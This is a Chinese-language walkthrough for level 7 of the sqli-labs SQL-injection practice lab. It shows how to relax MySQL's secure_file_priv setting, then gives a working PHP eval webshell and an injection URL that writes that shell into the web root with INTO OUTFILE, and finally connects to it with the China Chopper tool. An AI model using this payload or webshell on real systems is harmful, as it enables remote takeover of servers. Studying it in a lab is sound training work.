less-7
前置基礎知識:
1. 因為我們用的是phpstudy,所以存在一個文件讀寫權限問題,我們需要修改一下
首先在mysql命令行中用show variables like '%secure%';查看 secure-file-priv 當前的值,如果顯示為NULL,則需要打開 C:\phpstudy\PHPTutorial\MySQL\my.ini文件,在其中加上一句:secure_file_priv=“/”。
之后重啟PHP study,然后發現已經發現發生了改變,說明修改成功,就可以進行讀寫了。
第二個知識就是一句話木馬
一句話木馬有多個版本的,asp php的
這里我們只用到php版本的一句話木馬:
<?php @eval($_POST[“crow”]);?> 其中crow是密碼
一句話木馬大多配合中國菜刀使用,菜刀的使用可以參考:https://www.daixiaorui.com/read/17.html
以及第三個知識,用到的兩個函數:load_file() 讀取本地文件 into outfile 寫文件 可以百度函數用法,提示路徑需要用雙斜線
我們看到提示使用函數outfile,並且可以確定存在注入漏洞
之后我們用outfile將一句話木馬寫入文件,雖然依然顯示報錯,但是我們發現路徑下已經存在了我們想要的文件
http://192.168.5.100/sqli-labs/Less-7/?id=-1')) union select 1,2,'<?php @eval($_POST[“crow”]);?>' into outfile "C:\\phpstudy\\PHPTutorial\\WWW\\sqli-labs\\Less-7\\test.php" --+
這里注意一句話木馬里面的引號里面的就是密碼,我們用中國菜刀進行連接:
我們可以看到i,已經成功連接,可以進行文件管理
其實,用中國菜刀比較簡單,我們當然也可以把注入的內容回顯的數據用outfile輸出到文件中,步驟和前幾關就類似了。